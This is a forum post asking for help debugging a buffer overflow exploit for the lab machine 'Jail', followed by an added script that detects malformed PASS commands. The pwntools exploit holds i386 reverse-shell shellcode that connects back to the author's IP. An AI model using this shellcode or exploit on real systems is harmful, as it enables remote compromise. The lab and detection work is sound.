Is there anyone who could help me out with the buffer overflow for Jail?
I have created a buffer overflow following ippsec's tutorial, but for some reason I keep landing in my junk instead of landing in the buffer shellcode.
This is my exploit so far…
===========================================================
from pwn import *
context(os='linux', arch='i386')
HOST, PORT = 'MY IP', 7411
# Junk to get to EIP
junk = '\xCC' * 28
# Memory leaked
mem = p32(0xffdc64c0 + 32)
# Shellcode to execute
buf = ''
buf += "\x68"
buf += REMOVED IP # ← IP Number
buf += "\x5e\x66\x68"
buf += "\xd9\x03" # ← Port Number "55555"
buf += "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
buf += "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
buf += "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
buf += "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
buf += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
buf += "\xeb\xce"
# Connect to host
p = remote(HOST, PORT)
p.recvuntil("OK Ready. Send USER command.")
p.sendline("USER admin")
p.recvuntil("OK Send PASS command.")
p.sendline("DEBUG")
p.recvuntil("OK DEBUG mode on.")
p.sendline("PASS " + junk + mem + buf)
============================================================
ippsec does the memory leak + 32, which includes the 28 needed to get to the overflow + the 4 needed for the mem. I have done this, but unfortunately I keep getting SIGSEGV and it is reading back the \xCC's.
Anyone notice what I am doing wrong? I am sure it will be something small that I am not over yet.
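Looking at the same traffic from the monitoring side: the PASS command above is nothing a real login would send (dozens of non-printable bytes, a long run of 0xCC int3 padding). The following is an added example, not part of the post or of ippsec's material, that scans a constructed capture of this USER/PASS/DEBUG command channel and flags such arguments; MAX_PASS_LEN and the sample lines are assumptions made up for the example.

```python
import re
import string

# Constructed sample of a captured command channel: one ordinary login,
# then a PASS argument padded with 0xCC bytes followed by a few arbitrary
# non-printable bytes (made-up values, not a working payload).
SAMPLE_CAPTURE = [
    b"USER admin\n",
    b"PASS hunter2\n",
    b"DEBUG\n",
    b"PASS " + b"\xcc" * 28 + b"\xe0\x64\xdc\xff" + b"\x90\x90\x31\xc0" + b"\n",
]

PRINTABLE = set(string.printable.encode())
MAX_PASS_LEN = 24                     # assumption: a legitimate password is shorter
INT3_RUN = re.compile(rb"\xcc{8,}")   # eight or more int3 (0xCC) bytes in a row


def inspect_command(raw):
    """Return the list of findings for one captured command line (empty if benign)."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    findings = []
    if verb != b"PASS":               # only the PASS argument carries attacker data here
        return findings
    if len(arg) > MAX_PASS_LEN:
        findings.append("oversized PASS argument (%d bytes)" % len(arg))
    nonprint = sum(1 for b in arg if b not in PRINTABLE)
    if nonprint:
        findings.append("%d non-printable bytes in PASS argument" % nonprint)
    m = INT3_RUN.search(arg)
    if m:
        findings.append("run of %d 0xCC (int3) bytes" % len(m.group()))
    return findings


def scan(lines):
    """Map line index -> findings for every suspicious line in a capture."""
    result = {}
    for i, raw in enumerate(lines):
        findings = inspect_command(raw)
        if findings:
            result[i] = findings
    return result


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_CAPTURE).items():
        print("line %d: %s" % (idx, "; ".join(findings)))
```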